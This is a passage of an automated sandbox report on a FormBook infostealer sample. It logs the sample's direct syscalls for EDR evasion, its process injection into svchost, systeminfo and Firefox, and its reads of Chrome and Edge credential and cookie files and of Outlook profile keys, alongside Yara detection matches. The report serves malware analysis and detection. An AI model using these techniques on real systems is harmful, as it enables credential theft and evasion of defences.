Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]	2_2_03556962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]	2_2_03556962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]	2_2_03556962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0357096E mov eax, dword ptr fs:[00000030h]	2_2_0357096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0357096E mov edx, dword ptr fs:[00000030h]	2_2_0357096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0357096E mov eax, dword ptr fs:[00000030h]	2_2_0357096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BC912 mov eax, dword ptr fs:[00000030h]	2_2_035BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03528918 mov eax, dword ptr fs:[00000030h]	2_2_03528918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03528918 mov eax, dword ptr fs:[00000030h]	2_2_03528918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE908 mov eax, dword ptr fs:[00000030h]	2_2_035AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE908 mov eax, dword ptr fs:[00000030h]	2_2_035AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B892A mov eax, dword ptr fs:[00000030h]	2_2_035B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C892B mov eax, dword ptr fs:[00000030h]	2_2_035C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035649D0 mov eax, dword ptr fs:[00000030h]	2_2_035649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_035FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C69C0 mov eax, dword ptr fs:[00000030h]	2_2_035C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035629F9 mov eax, dword ptr fs:[00000030h]	2_2_035629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035629F9 mov eax, dword ptr fs:[00000030h]	2_2_035629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_035BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B89B3 mov esi, dword ptr fs:[00000030h]	2_2_035B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B89B3 mov eax, dword ptr fs:[00000030h]	2_2_035B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B89B3 mov eax, dword ptr fs:[00000030h]	2_2_035B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035309AD mov eax, dword ptr fs:[00000030h]	2_2_035309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035309AD mov eax, dword ptr fs:[00000030h]	2_2_035309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03560854 mov eax, dword ptr fs:[00000030h]	2_2_03560854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534859 mov eax, dword ptr fs:[00000030h]	2_2_03534859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534859 mov eax, dword ptr fs:[00000030h]	2_2_03534859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03542840 mov ecx, dword ptr fs:[00000030h]	2_2_03542840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BE872 mov eax, dword ptr fs:[00000030h]	2_2_035BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BE872 mov eax, dword ptr fs:[00000030h]	2_2_035BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C6870 mov eax, dword ptr fs:[00000030h]	2_2_035C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C6870 mov eax, dword ptr fs:[00000030h]	2_2_035C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BC810 mov eax, dword ptr fs:[00000030h]	2_2_035BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]	2_2_03552835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]	2_2_03552835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]	2_2_03552835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03552835 mov ecx, dword ptr fs:[00000030h]	2_2_03552835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]	2_2_03552835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]	2_2_03552835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A830 mov eax, dword ptr fs:[00000030h]	2_2_0356A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D483A mov eax, dword ptr fs:[00000030h]	2_2_035D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D483A mov eax, dword ptr fs:[00000030h]	2_2_035D483A

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00EE80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_00EE80A9

Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EBA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00EBA155
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EBA124 SetUnhandledExceptionFilter,		0_2_00EBA124

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtQueryVolumeInformationFile: Direct from: 0x76F12F2C	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtQuerySystemInformation: Direct from: 0x76F148CC	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtAllocateVirtualMemory: Direct from: 0x76F148EC	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtQueryAttributesFile: Direct from: 0x76F12E6C	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtReadVirtualMemory: Direct from: 0x76F12E8C	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtCreateKey: Direct from: 0x76F12C6C	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtSetInformationThread: Direct from: 0x76F12B4C	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtClose: Direct from: 0x76F12B6C
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtAllocateVirtualMemory: Direct from: 0x76F13C9C	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtWriteVirtualMemory: Direct from: 0x76F1490C	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtCreateUserProcess: Direct from: 0x76F1371C	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtTerminateThread: Direct from: 0x76F12FCC	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtCreateFile: Direct from: 0x76F12FEC	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtOpenFile: Direct from: 0x76F12DCC	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtQueryInformationToken: Direct from: 0x76F12CAC	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtAllocateVirtualMemory: Direct from: 0x76F12BEC	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtDeviceIoControlFile: Direct from: 0x76F12AEC	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtSetInformationThread: Direct from: 0x76F063F9	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtOpenSection: Direct from: 0x76F12E0C	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtMapViewOfSection: Direct from: 0x76F12D1C	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtResumeThread: Direct from: 0x76F136AC	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtCreateMutant: Direct from: 0x76F135CC	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtWriteVirtualMemory: Direct from: 0x76F12E3C	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtTerminateProcess: Direct from: 0x76F12D5C	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtNotifyChangeKey: Direct from: 0x76F13C2C	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtProtectVirtualMemory: Direct from: 0x76F07B2E	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtProtectVirtualMemory: Direct from: 0x76F12F9C	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtSetInformationProcess: Direct from: 0x76F12C5C	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtOpenKeyEx: Direct from: 0x76F12B9C	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtQueryInformationProcess: Direct from: 0x76F12C26	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtResumeThread: Direct from: 0x76F12FBC	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtDelayExecution: Direct from: 0x76F12DDC	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtReadFile: Direct from: 0x76F12ADC	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtQuerySystemInformation: Direct from: 0x76F12DFC	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	NtAllocateVirtualMemory: Direct from: 0x76F12BFC	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\systeminfo.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: NULL target: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: NULL target: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\systeminfo.exe

Thread register set: target process: 2456

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\systeminfo.exe

Thread APC queued: target process: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2A25008

Jump to behavior

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00EE87B1 LogonUserW,

0_2_00EE87B1

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00E93B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00E93B3A

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00E948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00E948D7

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00EF4C7F mouse_event,

0_2_00EF4C7F

Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\J1VpshZJfm.exe"	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	Process created: C:\Windows\SysWOW64\ctfmon.exe "C:\Windows\SysWOW64\ctfmon.exe"	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	Process created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00EE7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00EE7CAF

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00EE874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00EE874B

Source: J1VpshZJfm.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: J1VpshZJfm.exe, UNUqLBRwwpkr.exe, 00000004.00000000.1745601744.0000000001071000.00000002.00000001.00040000.00000000.sdmp, UNUqLBRwwpkr.exe, 00000004.00000002.3431338623.0000000001071000.00000002.00000001.00040000.00000000.sdmp, UNUqLBRwwpkr.exe, 00000009.00000000.1918181223.00000000019E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: UNUqLBRwwpkr.exe, 00000004.00000000.1745601744.0000000001071000.00000002.00000001.00040000.00000000.sdmp, UNUqLBRwwpkr.exe, 00000004.00000002.3431338623.0000000001071000.00000002.00000001.00040000.00000000.sdmp, UNUqLBRwwpkr.exe, 00000009.00000000.1918181223.00000000019E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: UNUqLBRwwpkr.exe, 00000004.00000000.1745601744.0000000001071000.00000002.00000001.00040000.00000000.sdmp, UNUqLBRwwpkr.exe, 00000004.00000002.3431338623.0000000001071000.00000002.00000001.00040000.00000000.sdmp, UNUqLBRwwpkr.exe, 00000009.00000000.1918181223.00000000019E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: UNUqLBRwwpkr.exe, 00000004.00000000.1745601744.0000000001071000.00000002.00000001.00040000.00000000.sdmp, UNUqLBRwwpkr.exe, 00000004.00000002.3431338623.0000000001071000.00000002.00000001.00040000.00000000.sdmp, UNUqLBRwwpkr.exe, 00000009.00000000.1918181223.00000000019E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: yProgram Manager

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00EB862B cpuid

0_2_00EB862B

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00EC4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00EC4E87

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00ED1E06 GetUserNameW,

0_2_00ED1E06

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00EC3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00EC3F3A

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00E949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00E949A0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1845812137.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3431429866.0000000004550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1851615513.00000000033B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3430419586.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3431547878.00000000045A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3431711821.0000000002780000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1852595076.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\systeminfo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\systeminfo.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: J1VpshZJfm.exe	Binary or memory string: WIN_81
Source: J1VpshZJfm.exe	Binary or memory string: WIN_XP
Source: J1VpshZJfm.exe	Binary or memory string: WIN_XPe
Source: J1VpshZJfm.exe	Binary or memory string: WIN_VISTA
Source: J1VpshZJfm.exe	Binary or memory string: WIN_7
Source: J1VpshZJfm.exe	Binary or memory string: WIN_8
Source: J1VpshZJfm.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1845812137.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3431429866.0000000004550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1851615513.00000000033B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3430419586.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3431547878.00000000045A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3431711821.0000000002780000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1852595076.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00F06283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00F06283
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00F06747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00F06747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
